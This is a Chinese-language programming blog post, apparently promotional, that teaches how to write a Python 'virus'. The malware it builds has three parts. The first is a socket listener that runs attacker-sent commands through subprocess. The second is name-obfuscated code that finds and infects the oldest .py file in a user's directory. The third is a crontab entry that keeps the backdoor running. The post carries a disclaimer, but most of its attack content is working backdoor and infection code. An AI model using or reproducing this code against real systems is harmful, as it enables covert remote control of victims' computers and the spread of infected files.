手写一个 Python "病毒"

今天的文章来展示一个 Python "病毒"，它感染其他 Python 文件来创建一个后门。后门利用 Python 的内置 socket 模块来创建一个监听器，用来连接到 Python 的内置子进程模块，从而靶机上执行命令，同时还通过创建一个 cronjob 来建立持久性，以在每天固定的时间运行后门。最终完整的 Python 脚本包含在本文末尾。注意：请不要将本文中提供的 Python 脚本用于恶意目的。虽然它不先进，但经过一些修改，它可以让完全控制某人的计算机。本文的主要目的是通过这些脚本，更好地了解黑客如何获取正常程序并使它们成为恶意程序。

话不多说，让我们开始吧。

 1. 建立通信

任何后门最重要的部分都是建立通信。现在，让我们为后门访问编写一段代码。通过 TCP 连接到靶机，我们使用套接字模块监听黑客的连接请求。在 socket 模块中，有一个函数也称为 socket，我们可以使用它来创建 TCP 或 UDP 套接字。使用 socket.socket 函数创建套接字时，我们需要提供两个参数来指定我们要使用的 IP 版本和第 4 层协议。在这个 Python 脚本中，我们将传入以下参数：socket.AF_INET 和 socket.SOCK_STREAM。

• AF_INET : 指定 IPv4
• SOCK_STREAM ：指定 TCP 而不是 UDP。
• socket.socket 函数返回一个对象，该对象由最终确定正在创建的套接字是侦听套接字（服务器）还是连接套接字（客户端）的方法组成。要创建侦听套接字，需要使用以下方法：
• bind > 将 IP 地址和端口绑定到网络接口
• listen > 指示我们的套接字开始监听传入的连接
• accept > 接受传入连接
• recv > 从连接的客户端接收数据
• send > 向连接的客户端发送数据

然而，最重要的方法是 recv 和 send。recv 方法会接收来自攻击者的命令，使用 subproces.run 函数在受害者的系统上执行它们，然后将执行命令的标准输出重定向到与攻击者建立的 TCP 连接。下面是 Python 代码：

from socket import socket, AF_INET, SOCK_STREAM
from subprocess import run, PIPE
from os import _exit


def serve():
    with socket(AF_INET, SOCK_STREAM) as soc:
        # [*] The obfuscated values are just the IP address and port to bind to
        soc.bind((ip, 端口))
        soc.listen(5)
        while True:
            conn, _ = soc.accept()
            while True:
                cmd = conn.recv(1024).decode("utf-8").strip()
                cmd_output = run(cmd.split(), stdout=PIPE, stderr=PIPE)
                if cmd_output.returncode == 0:
                    conn.send(bytes(cmd_output.stdout))
                else:
                    continue

serve()

 2. 感染目标 Python 文件

这段程序通过遍历指定目录（最好是用户的主目录）并查找修改时间最早的 Python 脚本。这里是测试，因此不是感染所有 Python 文件，而仅感染修改时间最早的文件。感染一个 Python 文件对于控制靶机来说已经够了。

def MTRkYmNubWx(self):
    YWJyZmFm = "/" if self.bGpqZ2hjen == "Linux" else "\"
    for Z3Jvb3RhbGZq, _, _ in walk(self.cHlkYWNhZWFpa):
        for f in glob(Z3Jvb3RhbGZq + YWJyZmFm + "*.py"):
            if f == Z3Jvb3RhbGZq + YWJyZmFm + __file__:
                continue
            eHhtbG1vZGF0 = stat(f).st_mtime
            ZHRmbGNhbW9k = datetime.fromtimestamp(eHhtbG1vZGF0)
            if not self.Z2hhenh4ZGwK:
                self.Z2hhenh4ZGwK = (f, ZHRmbGNhbW9k)
            elif ZHRmbGNhbW9k < self.Z2hhenh4ZGwK[1]:
                self.Z2hhenh4ZGwK = (f, ZHRmbGNhbW9k)
    self.dGVyeXB6Y2FjeH(self.Z2hhenh4ZGwK[0])

上述代码的部分变量使用了混淆，让人不易看懂，其实很简单，就是使用 os 模块中定义的 walk 和 stat 函数来遍历目录文件并获取它们的修改时间。获得的每个文件的修改时间被转换为 datetime.datetime 对象，以便我们可以使用 > < 和 == 等运算符轻松比较日期。在这个函数的最后，选定的目标 Python 文件名被传递到将后门服务器代码注入其中的函数。

 3. 通过 crontab 任务来持久化

这个 Python 后门的最后一个函数使用 subprocess.run 函数来调用一个 Linux shell 命令，该命令将在当前用户的 crontab 文件中创建一个条目。此条目指定计划的 cronjob 应在每天 14:00 定时运行。添加 crontab 对应的 shell 命令如下：

echo '00 14 * * * file_name | crontab -

然后我们让 Python 把上一步感染的文件添加到 crontab 中：

def YWZhdGhjCg(self):
    if self.bGpqZ2hjen == "Linux": 
        run(f"echo '00 14 * * * {self.Z2hhenh4ZGwK[0]}' | crontab -", shell=True)

以上就是本次分享的所有内容，如果你觉得文章还不错，欢迎关注公众号：Python编程学习圈，每日干货分享，发送“J”还可领取大量学习资料。或是前往编程学习网，了解更多编程技术知识。